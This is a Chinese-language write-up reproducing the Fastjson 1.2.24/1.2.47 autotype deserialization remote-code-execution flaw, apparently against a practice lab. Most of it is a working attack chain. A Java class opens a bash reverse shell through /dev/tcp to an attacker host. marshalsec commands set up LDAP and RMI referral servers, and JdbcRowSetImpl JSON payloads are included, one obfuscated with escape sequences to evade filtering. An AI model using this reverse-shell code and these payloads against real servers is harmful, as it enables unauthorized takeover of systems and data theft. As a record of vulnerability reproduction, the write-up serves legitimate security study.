1、前言
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
2、漏洞原理
漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。
原理解析:为了成功利用 Fastjson 1.2.47 RCE 反序列化漏洞,需要提前在 Kali 虚拟机中搭建 Web 服务器和 RMI 服务,随后当我们向 fastjson 服务器 POST 提交 POC 后,fastjson 服务器会访问远程 RMI 服务,RMI 再通过将请求重定向到 Web 服务器后下载存放在 Web服务器中的恶意 Java代码(已编译的反序列化类),从而成功实现远程命令执行
3、漏洞版本
fastjson 1.2.24 CNVD-2017-02833
fastjson 1.2.47 CNVD-2019-22238
4、漏洞复现
先下载攻击利用工具
https://github.com/RandomRobbieBF/marshalsec-jar
(1)使用ldap协议
将下面代码中的IP地址改为自己的攻击机地址,最后反弹shell接收的地址,保存为test.java文件
import java.lang.Runtime;
import java.lang.Process;
public class test {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/xxx.xxx.230.165/6677 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
使用命令javac test.java 将java文件编译为class文件
javac test.java
启动一个http服务将刚刚编译的test.class文件挂起来
python -m SimpleHTTPServer 6001
攻击机先开启一个nc监听
nc -lvvp 6677
攻击机在marshalsec-0.0.3-SNAPSHOT-all.jar工具目录下使用如下命令启动Ldap监听
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://xxx.xxx.230.165:6001/#test" 1389
开始攻击:
访问靶场
使用Burp抓包,发送到重放模块,并修改GET为POST,添加payload
Payload1
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://xxx.xx.230.165:1389/test",
"autoCommit":true
}
}
Payload2
{
"hrg786": {
"@\u0074\x79\x70e": "Lcom.s\u0075n.\u0072\u006Fwse\x74\x2E\u004A\u0064\u0062c\u0052owS\u0065t\u0049mpl;",
"dataSourceName": "ldap://xxx.xxx.230.165:1389/test",
"autoCommit": true
}
}
此时发现nc监听返回了shell
(2)使用rmi协议
前面的其他步骤都一样,在使用攻击工具步骤时,使用命令如下:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://XXX.XXX.230.165:6001/#test" 1099
抓包,使用payload:
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://175.24.230.165:1099/test",
"autoCommit":true
}
}
成功反弹shell